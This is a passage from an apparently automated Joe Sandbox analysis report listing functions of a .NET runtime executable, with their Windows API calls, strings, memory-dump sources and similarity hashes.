                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$ByteCharMultiWide$malloc$CommandCurrentLineProcessstrcmp
                                                                                                                                                                                                                          • String ID: 8.0.4$DOTNET_IPC_V1$Failed to send DiagnosticsIPC response$Windows$win-x86$x86
                                                                                                                                                                                                                          • API String ID: 1425245846-2645746373
                                                                                                                                                                                                                          • Opcode ID: d50daca6857d780c0c736d9f0491413df5c041b6d3f9fc2e5935583cea8499cb
                                                                                                                                                                                                                          • Instruction ID: 16207697fc06eba2617b162c0ad1cc0f3e67bd474be210f197f6d01195bf2965
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d50daca6857d780c0c736d9f0491413df5c041b6d3f9fc2e5935583cea8499cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26A1D074E102068BEF24DFA8D8A5EBE7BB4FF44300F05452CDA12AB394EB75A915CB50
                                                                                                                                                                                                                          Function 012DA140 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 269COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 012D67D0: GetCommandLineW.KERNEL32(00000000,00000000,?,?,?,012D9EF0,?,00000000), ref: 012D67E7
                                                                                                                                                                                                                            • Part of subcall function 012D67D0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 012D685F
                                                                                                                                                                                                                            • Part of subcall function 012D67D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012DAC36), ref: 012D6882
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 012DA17A
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012DA18A
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,15FF0164,000000FF,00000000,00000000), ref: 012DA1A6
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012DA1B5
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(A19C35FF), ref: 012DA20C
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012DA21A
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012DA228
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(006A1024), ref: 012DA239
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(15FF0164), ref: 012DA24A
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 012DA284
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012DA29B
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 012DA2BE
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012DA2C9
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 012DA321
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$ByteCharMultiWide$malloc$CommandCurrentLineProcessstrcmp
                                                                                                                                                                                                                          • String ID: 8.0.4$DOTNET_IPC_V1$Failed to send DiagnosticsIPC response$Windows$x86
                                                                                                                                                                                                                          • API String ID: 1425245846-3910065372
                                                                                                                                                                                                                          • Opcode ID: 93f9c5e60c784087feee34b0a5ff4c14f5eaee2cc72f9f18e37fb9c5b7ebe2ce
                                                                                                                                                                                                                          • Instruction ID: d127ae1ba36e29f644042de96c4b59997a310c78d175951cabea4f72f5910aab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93f9c5e60c784087feee34b0a5ff4c14f5eaee2cc72f9f18e37fb9c5b7ebe2ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA91E174A102169BEF24DFA9D895EBF77B5FF44300F04052CEA12AB390EB71A911CB51
                                                                                                                                                                                                                          Function 012D7A10 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 286memorystringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 012D7B15
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7B26
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 012D7B49
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7B74
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7B9D
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 012D7BDC
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7BEE
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 012D7C12
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7C2E
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7C5E
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7CE0
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7CEE
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000008,?), ref: 012D7D14
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000008,?), ref: 012D7D1F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,00000008,?), ref: 012D7D38
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000008,?), ref: 012D7D43
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Microsoft-Windows-DotNETRuntimeRundown, xrefs: 012D7C59
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFreeHeapMultiWidefree$malloc$isspacestrcmp
                                                                                                                                                                                                                          • String ID: Microsoft-Windows-DotNETRuntimeRundown
                                                                                                                                                                                                                          • API String ID: 3243207744-930870680
                                                                                                                                                                                                                          • Opcode ID: 4dfc73644c3cbef6ddb9fc97dc077eb0df91f094c8502c6a880944310f77c57b
                                                                                                                                                                                                                          • Instruction ID: 1fe1f8124ab7dee8f2b3602b413b21bb3afb568888a466986856084766b843c9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dfc73644c3cbef6ddb9fc97dc077eb0df91f094c8502c6a880944310f77c57b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5A18F71D1021AAFDF21CFA9DD84AAEBFB8FF05319F154129EA14B7290D7349910CBA1
                                                                                                                                                                                                                          Function 012D2660 Relevance: 27.3, APIs: 16, Strings: 2, Instructions: 262memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,7CAB6A82,00000000,?), ref: 012D268E
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 012D26EE
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D2702
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 012D2721
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D272C
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,x86,000000FF,00000000,00000000), ref: 012D2752
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D2769
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,x86,000000FF,00000000,?), ref: 012D2792
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D279D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 012D28FF
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D290D
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D291B
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D2929
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidefree$malloc$FreeHeap
                                                                                                                                                                                                                          • String ID: Windows$x86
                                                                                                                                                                                                                          • API String ID: 2947220873-2949386511
                                                                                                                                                                                                                          • Opcode ID: 32ef0cbb819fafa110e47ce9f38c74a1699738afec46bfbe960028f69fad7fed
                                                                                                                                                                                                                          • Instruction ID: 98acdfedb6d5a09648f7caa368ffb3e639e603f64943bc1789acfd7ef4b23975
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32ef0cbb819fafa110e47ce9f38c74a1699738afec46bfbe960028f69fad7fed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE91E374E10316DBEB259FA9DC86BAE7BB4BF44710F15423DEA16A73A0DB709500CB90
                                                                                                                                                                                                                          Function 00FE35B0 Relevance: 25.4, APIs: 13, Strings: 1, Instructions: 884librarymemoryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FE3420: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(_CorDllMain,?,?,?), ref: 00FE351F
                                                                                                                                                                                                                            • Part of subcall function 00FE3420: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(__CorDllMain@12,?), ref: 00FE3532
                                                                                                                                                                                                                            • Part of subcall function 00FE3420: GetModuleHandleExW.KERNEL32(00000006,00000000,?), ref: 00FE354E
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTokenForVTableEntry), ref: 00FE3625
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 00FE394B
                                                                                                                                                                                                                            • Part of subcall function 00FD0090: LeaveCriticalSection.KERNEL32(0CB3F4BC,7CAB6A82,0CB3F4BC,CEA1900B,?,014B4FE0,000000FF,?,01006516,?,0000000C,?,?,?,?,7CAB6A82), ref: 00FD00B7
                                                                                                                                                                                                                            • Part of subcall function 01151BE0: RtlFreeHeap.NTDLL(00000000,?,00000018,0000000C,7CAB6A82,00000000,00000000,?,?,00000000,014D42B0,000000FF,?,00000000,00FE37F7,00000000), ref: 01151C85
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FE4080
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$CriticalFreeLeaveSectionstrcmp$AddressAllocateHandleModuleProcProcess
                                                                                                                                                                                                                          • String ID: GetTokenForVTableEntry
                                                                                                                                                                                                                          • API String ID: 432076431-2104580547
                                                                                                                                                                                                                          • Opcode ID: 7ce92b6fc4bd1c4579fc3462a83deb265015957e6abbd6df310b0b84df14721c
                                                                                                                                                                                                                          • Instruction ID: b7a24590858bd61b4cc2c61c062142a8d02b03262b68898b5309a514b06f6a7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ce92b6fc4bd1c4579fc3462a83deb265015957e6abbd6df310b0b84df14721c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13829B70E00259DFDB24CFA9C888BADBBF1BF58314F148159E945AB391DB34AE41DB90
                                                                                                                                                                                                                          Function 0141B5D0 Relevance: 24.9, APIs: 11, Strings: 3, Instructions: 378libraryloadermemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(kernelbase.dll,00000000,?,?), ref: 0141B5F1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 0141B603
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,MapViewOfFile3), ref: 0141B614
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0141B620
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00042000,00000001,00000000,00000000,00000000,?,?), ref: 0141B6B0
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,?,00008002,?,00000000,?,00000002,?), ref: 0141B7AA
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,?,00008002,?,00000000,?,00000002,?), ref: 0141B867
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00000000,?,00004000,00000020,00000000,00000000,?,00000000,?,00000002,?), ref: 0141B89E
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,?,00008002), ref: 0141B8F8
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00007000,00000004,00000000,00000000), ref: 0141B922
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 0141B979
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual$CurrentProcess$AddressLibraryProc$LoadProtect
                                                                                                                                                                                                                          • String ID: MapViewOfFile3$VirtualAlloc2$kernelbase.dll
                                                                                                                                                                                                                          • API String ID: 4183467025-775992288
                                                                                                                                                                                                                          • Opcode ID: 4217e523c644372f110293a4736b78e1a3c541f6acb14454c330bd3c8db91190
                                                                                                                                                                                                                          • Instruction ID: 7d7f4355c12947e458fe599dd8334979d576baca6cfdc04e305dfb971b66f804
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4217e523c644372f110293a4736b78e1a3c541f6acb14454c330bd3c8db91190
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95E1A275E002199FDB14CF99DC81BAEBBB6FF48310F15816AE905B73A8D731A901CB94
                                                                                                                                                                                                                          Function 01010950 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 277COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(7CAB6A82,80131506,?,?,010D4BD5,?,00000000,80131506,016371B8), ref: 010109C2
                                                                                                                                                                                                                          • RaiseFailFastException.KERNEL32(?,?,00000000,?,010D4BD5,?,00000000,80131506), ref: 01010AF0
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010B51
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010B62
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010B6C
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010B95
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,010D4BD5,?,00000000), ref: 01010BAE
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,010D4BD5,?,00000000), ref: 01010BB8
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,016371B8), ref: 01010BFE
                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,016371B8), ref: 01010C0C
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010CCD
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010CD7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • D::RFFE: Return from RaiseFailFastException, xrefs: 01010B0B
                                                                                                                                                                                                                          • D::RFFE: About to call RaiseFailFastException, xrefs: 01010ABF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorMode$DebuggerPresent$_errno$BreakDebugExceptionFailFastFreeHeapRaisewcstoul
                                                                                                                                                                                                                          • String ID: D::RFFE: About to call RaiseFailFastException$D::RFFE: Return from RaiseFailFastException
                                                                                                                                                                                                                          • API String ID: 2811416661-485428011
                                                                                                                                                                                                                          • Opcode ID: bd49f86f76b3b71371067bc2bcf2481a25818012927d4b1d2c971085057f80bf
                                                                                                                                                                                                                          • Instruction ID: 530bfabc5bf078211b1594ea53b4673e6ceafee074a34dbf88260e28b20b496b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd49f86f76b3b71371067bc2bcf2481a25818012927d4b1d2c971085057f80bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68A1E231B003059FEB24DF68DD95B6ABBA5FB04710F1541ADFA85AB3ACCB789840CB51
